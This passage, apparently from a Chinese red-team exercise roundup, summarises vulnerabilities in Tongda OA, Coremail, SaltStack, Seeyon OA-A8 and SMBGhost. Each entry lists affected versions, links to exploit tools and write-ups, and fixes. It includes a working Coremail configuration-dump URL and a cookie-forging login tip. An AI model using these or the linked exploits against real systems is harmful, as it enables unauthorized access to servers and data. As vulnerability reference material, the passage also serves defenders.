5.詳細文章
https://www.cnblogs.com/lovequitepcs/p/12864203.html
6.利用技巧與坑點
可以使用chrome的EditThisCookie插件修改cookie，修改cookies別忘記訪問，否則無法登錄成功
/general/index.php?isIB=0&modify_pwd=0
7.防護方法
升級通達oa到最新版本

通達OA命令執行漏洞
1.漏洞簡介
通達OA採用基於WEB的企業計算，主HTTP伺服器採用了世界上最先進的Apache伺服器，性能穩定可靠。數據存取集中控制，避免了數據洩漏的可能。提供數據備份工具，保護系統數據安全。多級的權限控制，完善的密碼驗證與登錄驗證機制更加強了系統安全性。
2.影響範圍
通達OA V11版
通達OA 2017版
通達OA 2016版
通達OA 2015版
通達OA 2013增強版
通達OA 2013版
3.漏洞利用工具
https://github.com/jas502n/OA-tongda-RCE
4.詳細文章
https://zhuanlan.zhihu.com/p/114264570
5.防護方法
更新通達oa最新補丁
安全更新地址:http://www.tongda2000.com/news/673.php

通達OA掃碼登錄任意用戶登錄
1.漏洞簡介
通達OA採用基於WEB的企業計算，主HTTP伺服器採用了世界上最先進的Apache伺服器，性能穩定可靠。數據存取集中控制，避免了數據洩漏的可能。提供數據備份工具，保護系統數據安全。多級的權限控制，完善的密碼驗證與登錄驗證機制更加強了系統安全性。
2.影響範圍
通達OA v2017、v11.x < v11.5 支持掃碼登錄版本
3.漏洞分析文章
https://xz.aliyun.com/t/7704#toc-4

漏洞簡介
Coremail郵件系統配置文件信息洩露漏洞
Coremail產品誕生於1999年，經過二十多年發展，如今從億萬級別的運營系統，到幾萬人的大型企業，都有了Coremail的客戶。
截止2019年，Coremail郵件系統產品在國內已擁有10億終端用戶  ，是目前國內擁有郵箱使用用戶最多的郵件系統。Coremail今天不但為網易（126、163、yeah）、移動，聯通等知名運營商提供電子郵件整體技術解決方案及企業郵局運營服務，還為石油、鋼鐵、電力、政府、金融、教育、尖端製造企業等用戶提供郵件系統軟體和反垃圾服務。
利用方式
http://host/mailsms/s?func=ADMIN:appState&dumpConfig=/
瀏覽器請求訪問，即可查看配置文件信息。
修複方法
更新Coremail版本或聯繫廠家修復

漏洞簡介
SaltStack是基於Python開發的一套C/S架構配置管理工具，是一個伺服器基礎架構集中化管理平臺，具備配置管理、遠程執行、監控等功能。
影響範圍：
SaltStack < 2019.2.4
 SaltStack < 3000.2
漏洞利用工具
Saltstack遠程命令執行漏洞EXP
https://github.com/Imanfeng/SaltStack-Exp.git
詳細文章
https://www.cnblogs.com/Cl0wn/p/12918432.html
修複方法
更新版本
SaltStack = 2019.2.4
SaltStack = 3000.2
https://github.com/saltstack/salt/commit/a67d76b15615983d467ed81371b38b4a17e4f3b7
https://github.com/saltstack/salt/commit/d5801df94b05158dc8e48c5e6912b065044720f3

漏洞簡介
CNVD《關於致遠OA-A8系統存在遠程命令執行漏洞的安全公告》：https://www.cnvd.org.cn/webinfo/show/5095
該系統的漏洞點在於致遠OA-A8系統的Servlet接口暴露，安全過濾處理措施不足，使得用戶在無需認證的情況下實現任意文件上傳。
攻擊者利用該漏洞，可在未授權的情況下，遠程發送精心構造的網站後門文件，從而獲取目標伺服器權限，在目標伺服器上執行任意代碼漏洞。
影響範圍
致遠OA A8-V5 V6.1 SP1
致遠OA A8+協同管理軟體 V7.0
致遠OA A8+協同管理軟體 V7.0 SP1
致遠OA A8+協同管理軟體 V7.0 SP2
致遠OA A8+協同管理軟體 V7.0 SP3
致遠OA A8+協同管理軟體 V7.1
漏洞利用工具
https://github.com/timwhitez/seeyon-OA-A8-GetShell
詳細文章
https://www.jianshu.com/p/0955bdd7329c 任意文件上傳詳情
https://www.cnblogs.com/AtesetEnginner/p/12106741.html 歷史漏洞相關信息

漏洞簡介
微軟SMBv3 Client/Server遠程代碼執行漏洞CVE-2020-0796
影響範圍：
Windows 10 Version 1903 for 32-bit SystemsWindows 10 Version 1903 for x64-based SystemsWindows 10 Version 1903 for ARM64-based SystemsWindows Server, Version 1903 (Server Core installation)Windows 10 Version 1909 for 32-bit SystemsWindows 10 Version 1909 for x64-based SystemsWindows 10 Version 1909 for ARM64-based SystemsWindows Server, Version 1909 (Server Core installation)
漏洞利用工具
https://github.com/chompie1337/SMBGhost_RCE_PoC
詳細文章
https://www.cnblogs.com/Iamyoyodan/p/13081273.html
利用技巧與坑點
偶爾會藍屏
防護方法
關閉高危埠139、445，更新系統安全補丁禁用SMBv3壓縮命令:
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" DisableCompression -Type DWORD -Value 1 -Force
HW平安夜: 09/12 漏洞PAYlOAD
HW平安夜: 09/14 漏洞PAYlOAD
2020HW小技巧總結（獻上本人收藏多年的子域名字典）
2020HW紅方漏洞利用總結（一）
2020HW紅方漏洞利用總結（二）
紅隊滲透手冊之信息收集篇
HW演習前的自我信息排查
掃描關注LemonSec